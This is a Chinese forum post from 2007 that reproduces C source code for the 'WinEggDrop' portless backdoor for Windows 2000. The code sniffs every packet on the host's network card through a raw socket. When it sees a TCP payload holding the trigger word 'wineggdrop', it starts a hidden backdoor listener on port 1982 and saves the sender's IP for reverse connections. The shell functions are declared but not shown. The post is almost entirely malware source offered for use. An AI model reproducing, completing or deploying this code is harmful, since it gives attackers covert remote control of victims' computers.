WinEggDrop后门v1.0源代码

猪猪
Wei.H
论坛-管理员
Rank: 15
岁月联盟 - 最高管理
终身成就勋章优秀管理勋章核心成员
1^# 大中小发表于 2007-2-12 23:16 只看该作者
WinEggDrop后门v1.0源代码

信息来源：neeao
复制内容到剪贴板
代码:

//**********************************************************************

// Version: V1.0

// Coder: WinEggDrop

// Date Release: NULL

// Purpose: To Demonstrate Some Portless Backdoor Technique

// Test PlatForm: Win 2K Pro And Server SP4

// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)

//**********************************************************************



#include <windows.h>

#include <stdio.h>

#include <winsock2.h>



// Some Structures To Define

#define IP_HDRINCL     2

#define SIO_RCVALL       _WSAIOW(IOC_VENDOR,1)

#define MAX_PACK_LEN   65535

#define MAX_ADDR_LEN   16

#define MAX_HOSTNAME_LAN   255



typedef struct _iphdr

{

  unsigned char h_lenver;

  unsigned char tos;

  unsigned short total_len;

  unsigned short ident;

  unsigned short frag_and_flags;

  unsigned char ttl;

  unsigned char proto;

  unsigned short checksum;

  unsigned int   sourceIP;

  unsigned int   destIP;

}IP_HEADER;



typedef struct _tcphdr

{

  USHORT th_sport;

  USHORT th_dport;

  unsigned int th_seq;

  unsigned int th_ack;

  unsigned char th_lenres;

  unsigned char th_flag;

  USHORT th_win;

  USHORT th_sum;

  USHORT th_urp;

}TCP_HEADER;

// End Of Structure



// Global Variable

char SourceIPAddress[MAX_ADDR_LEN];   // Hold The Source IP(This Can Be Used To Do Reverse Connection)

int BackDoorPort = 0;   // The Port Back Door Will Bind



// Function ProtoType Declaration

//------------------------------------------------------------------------------------------------------

BOOL   InitSocket();

BOOL   DoSniffing();

BOOL   DecodeIPPack(const char *Buffer,const int BufferSize);

BOOL   DecodeTCPPack(const char * TCPBuffer,const int BufferSize);

BOOL   IsWin2KOrAbove();

DWORD WINAPI StartBackDoor(LPVOID Para);

BOOL   GetABackDoorShell(const SOCKET ListenSocket);

BOOL   SendSocket(const SOCKET ClientSocket,const char *Message);

unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);

//------------------------------------------------------------------------------------------------------

// End Of Fucntion ProtoType Declaration



// Main Function

int main(int argc,char *argv[])

{

if (!IsWin2KOrAbove())   // This System Running This Program Is Not Win 2K Or Above

{

  printf("The Program Must Run Under Win 2k Or Above OS\n");   // Display This Message

  return -1;   // Quit The Program

}



if (argc == 2)     // We Get Argument

  BackDoorPort = atoi(argv[1]);     // Argument One Is The Back Door's Port

else   // No Argument

  BackDoorPort = 1982;     // Back Door's Port Will Be Defined On 1982



if (!InitSocket())   // Fail To Initize Socket

{

  printf("Fail To Start Up Winsock\n");   // Display Error Message

  return -1;   // Quit The Program

}

DoSniffing();   // Do Sniffing

return 0;   // Quit The Program

}// End Of Main Function



//-------------------------------------------------------------------------

// Purpose: To Initize Socket

// Return Type: Boolean

// Parameters: NULL

// This Is Too Simple,I Won't Comment It

//-------------------------------------------------------------------------

BOOL InitSocket()

{

WSADATA data;

WORD ver;



ver = MAKEWORD(2,2);

if (WSAStartup( ver, &data )!= 0 )

{

  return FALSE;

}

return TRUE;

}// End Of InitSocket Function



//-------------------------------------------------------------------------

// Purpose: To Do None-Driver Sniffing

// Return Type: Boolean

// Parameters: NULL

//-------------------------------------------------------------------------

BOOL DoSniffing()

{

int Length=0;   // Variable To Hold The Receive Buffer Length

char RecvBuf[MAX_PACK_LEN] = {0};   // Receive Buffer

SOCKET SocketRaw = INVALID_SOCKET;   // Raw Socket



SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);   // Create A Raw Socket

if (SocketRaw == INVALID_SOCKET)     // Fail To Create A Raw Socket

{

  printf("Fail To Create A Raw Socket\n");   // Display Error Message

  return FALSE;   // Return False

}



char FAR name[MAX_HOSTNAME_LAN];



if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)     // Fail To Get The Host Name

{

  printf("Fail To Get Host Name\n");   // Display Error Message

  closesocket(SocketRaw);     // Close The Raw Socket Created

  return FALSE;   // Return False

}



// The Below Is The NIC Stuff

struct hostent FAR * pHostent;

pHostent = (struct hostent * )malloc(sizeof(struct hostent));   // Allocate Hostent Buffer

pHostent = gethostbyname(name);

SOCKADDR_IN sa;

sa.sin_family = AF_INET;   // That's Internet Related

sa.sin_port = htons(0);     // Any Port Avariable On The OS

if (pHostent->h_addr_list[0] != 0)   // We Only Check The First NIC

{

  memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);   // We Use The First NIC As The Sniffing Subject

}

else   // Well,The First NIC Is Not Valid

{

  printf("Get Host By Name Fails\n");     // Display Error Message

  free(pHostent);   // Free The Hostent Buffer

  closesocket(SocketRaw);

  return FALSE;   // Return FALSE;

}

free(pHostent);   // Free The Hostent Buffer



if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)   // Bind The Raw Socket On The First NIC,But Fails

{

  printf("Fail To Bind\n");   // Display Error Message

  closesocket(SocketRaw);     // Close The Raw Socket

  return FALSE;   // Return False

}



// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes) 

DWORD dwBufferLen[10] ;

DWORD dwBufferInLen = 1 ;

DWORD dwBytesReturned = 0 ;



if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)

{

  closesocket(SocketRaw);

  return FALSE;

}



while(TRUE)     // Sniffing Starts Here With Forever Loop

{

  memset(RecvBuf, 0, sizeof(RecvBuf));   // Reset The Receive Buffer

  Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);   // Try To Receive Data

  if (Length == SOCKET_ERROR)   // Get Error As Receiving Data

  {

    printf("Fail To Receive Data\n");   // Display Error Message

    break;   // Leave The Loop

  }

  if (DecodeIPPack(RecvBuf,Length))   // Decode The Buffer Received,And The Active Code Is Found

  {

    printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);     //We Are Going To Activate The BackDoor

    DWORD dwThreadID;

    HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);   // Create The Back Door Thread

    WaitForSingleObject(BackDoorThread,INFINITE);   // Wait Until The Back Door Ends

  }

}



closesocket(SocketRaw);     // Close The Raw Socket

return TRUE;   // Return

}// End Of DoSniffing Function



//-------------------------------------------------------------------------

// Purpose: To Decode The IP Packer

// Return Type: Boolean

// Parameters: 1.const char *Buffer   -->The Received Buffer

//         2.Const int BufferSize -->The Received Buffer Size

//-------------------------------------------------------------------------

BOOL DecodeIPPack(const char *Buffer,const int BufferSize)

{

IP_HEADER *pIpheader;   // IP Header

SOCKADDR_IN saSource, saDest;

pIpheader = (IP_HEADER *)Buffer;     // Transfer The Buffer Into IP Header Form

int Protocol = pIpheader->proto;     // Get The Protocol

if ((Protocol != IPPROTO_TCP))   // Not TCP Protocol

{

  return FALSE;   // Return False Since We Only Interest In TCP Protocol

}



saSource.sin_addr.s_addr = pIpheader->sourceIP;

strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);   // Get The Source IP(Important For Doing Reverse Connection)



int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);   // Get The IP Length

return DecodeTCPPack(Buffer+IPLength, BufferSize);     // Decode TCP Packer

}// End Of DecodeIPPack Function



//-------------------------------------------------------------------------

// Purpose: To Decode The TCP Packer

// Return Type: Boolean

// Parameters: 1.const char *TCPBuffer -->The TCP Buffer

//         2.Const int BufferSize   -->The TCP Buffer Size

//-------------------------------------------------------------------------

BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)

{

TCP_HEADER * pTcpHeader;   // TCP Header

int iSourcePort,iDestPort;     // Source Port And DestPort



pTcpHeader = (TCP_HEADER * )TCPBuffer;     // Transfer The Buffer Into TCP Header Form

int TcpHeaderLen = pTcpHeader->th_lenres>>4;   // Get The TCP Leader Length

TcpHeaderLen *= sizeof(unsigned long);

char * TcpData=TCPBuffer+TcpHeaderLen;     // Get The TCP Data



iSourcePort = ntohs(pTcpHeader->th_sport);   // Get The Source Port

iDestPort = ntohs(pTcpHeader->th_dport);   // Get The Destination Port

if (strstr(TcpData,"wineggdrop")!=NULL)   // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo

{

  printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);   // Display A Message

  return TRUE;   // Return TRUE(The Back Door Will Be Activated Soon)

}

return FALSE;   // We Didn't Receive An Active Code,Return False

}// End Of DecodeTCPPack Function

//-------------------------------------------------------------------------
TOP
‹‹ 上一主题 | 下一主题 ››